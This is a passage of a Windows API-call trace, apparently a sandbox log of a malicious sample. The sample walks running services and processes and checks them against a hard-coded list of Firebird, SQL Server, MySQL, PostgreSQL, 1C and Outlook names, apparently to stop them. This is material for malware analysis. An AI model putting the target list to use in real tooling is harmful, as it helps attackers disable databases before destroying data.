	[0037.004] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0037.004] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0037.004] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0037.004] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0037.004] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0037.004] lstrlenW (lpString="RpcEptMapper") returned 12
	[0037.004] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0037.004] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0037.004] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0037.004] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0037.004] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0037.004] lstrlenW (lpString="RpcSs") returned 5
	[0037.004] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0037.004] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0037.004] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0037.004] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0037.004] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0037.004] lstrlenW (lpString="SamSs") returned 5
	[0037.004] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0037.004] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0037.004] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0037.004] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0037.004] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0037.004] lstrlenW (lpString="Schedule") returned 8
	[0037.004] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0037.004] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0037.004] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0037.004] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0037.005] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0037.005] lstrlenW (lpString="SENS") returned 4
	[0037.005] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0037.005] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0037.005] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0037.005] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0037.005] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0037.005] lstrlenW (lpString="ShellHWDetection") returned 16
	[0037.005] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0037.005] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0037.005] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0037.005] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0037.005] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0037.005] lstrlenW (lpString="Spooler") returned 7
	[0037.005] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0037.005] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0037.005] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0037.005] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0037.005] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0037.005] lstrlenW (lpString="SysMain") returned 7
	[0037.005] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0037.005] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0037.005] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0037.005] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0037.005] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0037.005] lstrlenW (lpString="Themes") returned 6
	[0037.005] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0037.005] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0037.005] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0037.005] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0037.005] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0037.005] lstrlenW (lpString="TrkWks") returned 6
	[0037.005] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0037.005] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0037.006] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0037.006] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0037.006] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0037.006] lstrlenW (lpString="UxSms") returned 5
	[0037.006] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0037.006] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0037.006] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0037.006] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0037.006] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0037.006] lstrlenW (lpString="WdiServiceHost") returned 14
	[0037.006] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0037.006] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0037.006] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1
	[0037.006] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1
	[0037.006] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1
	[0037.006] lstrlenW (lpString="WdiSystemHost") returned 13
	[0037.006] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0037.006] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0037.006] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1
	[0037.006] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1
	[0037.006] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1
	[0037.006] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19
	[0037.006] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0037.006] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0037.006] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1
	[0037.006] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1
	[0037.006] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1
	[0037.006] lstrlenW (lpString="Winmgmt") returned 7
	[0037.006] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0037.006] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0037.006] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0037.006] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0037.006] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0037.006] lstrlenW (lpString="WPDBusEnum") returned 10
	[0037.007] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0037.007] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0037.007] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1
	[0037.007] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1
	[0037.007] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1
	[0037.007] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e5ca88 | out: hHeap=0x7d60000) returned 1
	[0037.007] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1bc
	[0037.009] Process32FirstW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0037.009] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0037.010] lstrlenW (lpString="System") returned 6
	[0037.010] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0037.010] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0037.010] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0037.010] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0037.010] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0037.010] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0037.010] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0037.010] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0037.010] lstrlenW (lpString="smss.exe") returned 8
	[0037.011] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0037.011] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0037.011] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0037.011] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0037.011] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0037.011] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0037.011] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0037.011] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0037.011] lstrlenW (lpString="csrss.exe") returned 9
	[0037.011] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0037.011] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0037.011] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0037.011] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0037.011] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0037.011] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0037.011] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0037.011] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0037.012] lstrlenW (lpString="wininit.exe") returned 11
	[0037.012] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0037.012] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0037.012] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0037.012] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0037.012] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0037.012] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0037.012] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0037.012] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0037.012] lstrlenW (lpString="csrss.exe") returned 9
	[0037.013] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0037.013] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0037.013] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0037.013] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0037.013] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0037.013] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0037.013] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0037.013] lstrlenW (lpString="winlogon.exe") returned 12
	[0037.013] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0037.014] lstrlenW (lpString="services.exe") returned 12
	[0037.014] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0037.014] lstrlenW (lpString="lsass.exe") returned 9
	[0037.014] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0037.015] lstrlenW (lpString="lsm.exe") returned 7
	[0037.015] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0037.015] lstrlenW (lpString="svchost.exe") returned 11
	[0037.015] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0037.016] lstrlenW (lpString="svchost.exe") returned 11
	[0037.016] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0037.016] lstrlenW (lpString="svchost.exe") returned 11
	[0037.016] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0037.016] lstrlenW (lpString="svchost.exe") returned 11
	[0037.016] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0037.017] lstrlenW (lpString="svchost.exe") returned 11
	[0037.017] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0037.017] lstrlenW (lpString="audiodg.exe") returned 11
	[0037.017] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0037.018] lstrlenW (lpString="svchost.exe") returned 11
	[0037.018] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0037.018] lstrlenW (lpString="svchost.exe") returned 11
	[0037.018] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0037.019] lstrlenW (lpString="dwm.exe") returned 7
	[0037.019] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0037.019] lstrlenW (lpString="explorer.exe") returned 12
	[0037.019] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0037.020] lstrlenW (lpString="spoolsv.exe") returned 11
	[0037.020] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0037.020] lstrlenW (lpString="taskhost.exe") returned 12
	[0037.020] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0037.021] lstrlenW (lpString="svchost.exe") returned 11
	[0037.021] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0037.021] lstrlenW (lpString="taskeng.exe") returned 11
	[0037.021] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0037.022] lstrlenW (lpString="taskhost.exe") returned 12
	[0037.022] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="encoding hanging.exe")) returned 1
	[0037.022] lstrlenW (lpString="encoding hanging.exe") returned 20
	[0037.022] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="python tragedy.exe")) returned 1
	[0037.022] lstrlenW (lpString="python tragedy.exe") returned 18
	[0037.023] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="talent-mastercard.exe")) returned 1
	[0037.023] lstrlenW (lpString="talent-mastercard.exe") returned 21
	[0037.023] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="computers.exe")) returned 1
	[0037.023] lstrlenW (lpString="computers.exe") returned 13
	[0037.023] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="separated.exe")) returned 1
	[0037.024] lstrlenW (lpString="separated.exe") returned 13
	[0037.024] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="disks executives interval.exe")) returned 1
	[0037.024] lstrlenW (lpString="disks executives interval.exe") returned 29
	[0037.024] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="darkness.exe")) returned 1
	[0037.025] lstrlenW (lpString="darkness.exe") returned 12
	[0037.025] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="crafts-distinct.exe")) returned 1
	[0037.025] lstrlenW (lpString="crafts-distinct.exe") returned 19
	[0037.025] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sophisticated.exe")) returned 1
	[0037.026] lstrlenW (lpString="sophisticated.exe") returned 17
	[0037.026] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wishlist.exe")) returned 1
	[0037.026] lstrlenW (lpString="wishlist.exe") returned 12
	[0037.026] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="top.exe")) returned 1
	[0037.027] lstrlenW (lpString="top.exe") returned 7
	[0037.027] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="implemented.exe")) returned 1
	[0037.027] lstrlenW (lpString="implemented.exe") returned 15
	[0037.027] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="comp.exe")) returned 1
	[0037.028] lstrlenW (lpString="comp.exe") returned 8
	[0037.028] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="synthetic_memphis.exe")) returned 1
	[0037.028] lstrlenW (lpString="synthetic_memphis.exe") returned 21
	[0037.028] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solved.exe")) returned 1
	[0037.028] lstrlenW (lpString="solved.exe") returned 10
	[0037.028] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bosnia resolution.exe")) returned 1
	[0037.029] lstrlenW (lpString="bosnia resolution.exe") returned 21
